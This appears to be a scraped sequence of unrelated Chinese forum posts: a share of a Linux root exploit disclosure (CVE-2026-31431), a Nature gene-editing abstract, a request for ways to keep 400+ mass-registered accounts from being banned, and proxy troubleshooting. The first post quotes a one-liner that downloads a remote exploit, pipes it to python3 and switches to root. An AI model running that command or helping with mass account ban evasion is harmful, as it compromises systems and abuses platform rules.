早上看到一个漏洞，太猛了，直接提权，具体内容可以看

  
      

      xint.io – 29 Apr 26
  

  
    

Copy Fail: 732 Bytes to Root on Every Major Linux Distributions - Xint

  Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Security,  Vulnerability Research


  

  
    
    
  

  


curl https://copy.fail/exp | python3 && su

Xint 发现了 CVE-2026-31431，一个身份验证绕过的临时写入漏洞，通过 AF_ALG + splice() 实现 4 字节页面缓存写入。一个 732 字节的概念验证代码可在 Ubuntu、Amazon Linux、RHEL 和 SUSE 上获取 root 权限。
我自己试了一下，ubuntu22.04 已更新所有补丁

https://www.nature.com/articles/s41586-026-10460-4

靶向插入大片段DNA在基因组工程和基因治疗领域具有广阔的应用前景 1,2  。双引物编辑引导RNA（Twin Prime Editing guide RNA）能够实现相对较大的插入，但对于大于400个碱基对的插入，其效率仍然较低 3,4,5,6  。本文介绍了一种用于插入大片段DNA供体片段的引物组装（PA）方法，该方法设计的片段末端与双引物编辑（twinPE）产生的片段重叠。我们利用PA方法插入了一个或多个重叠的DNA片段，总插入片段大小范围为0.1 kb至11 kb。非同源末端连接（NHEJ）抑制剂提高了插入的效率和精确度。PA方法依赖于易于制备的DNA模板，无需共递送外源DNA依赖性DNA聚合酶，并且可在非增殖细胞中进行，这表明其不依赖于经典的同源定向修复途径。我们的研究表明，PA 可以启动细胞中的 Gibson 样组装，从而产生基因插入，而无需双链 DNA 断裂、重组酶或同源定向修复。


  
      

      phys.org
  

  
    

New genome editing method could swap entire genes and correct 1000 mutations...

  New technology enables the insertion of a large segment of DNA into a genome, potentially expanding gene therapy treatment from cancellation of disease-causing mutations to replacement of an entire gene, scientists say.


  

  
    
    
  

  


https://www.nature.com/articles/s41586-026-10395-w

两天慢慢注册了四百多个号，全部还没用就封完了，大佬们有保号注册法子吗？

有佬知道为什么吗
用的ikuuu家的，前天重置了一下订阅链接，今天全红了，
手机上小火箭完全没问题
ikuuu的旧版clash和我的flclash全红

v2rayN 才勉强挑出来一个能用的

真的莫名其妙，改个游戏的效果，怎么也要被网络安全风险标记，到底怎么避免？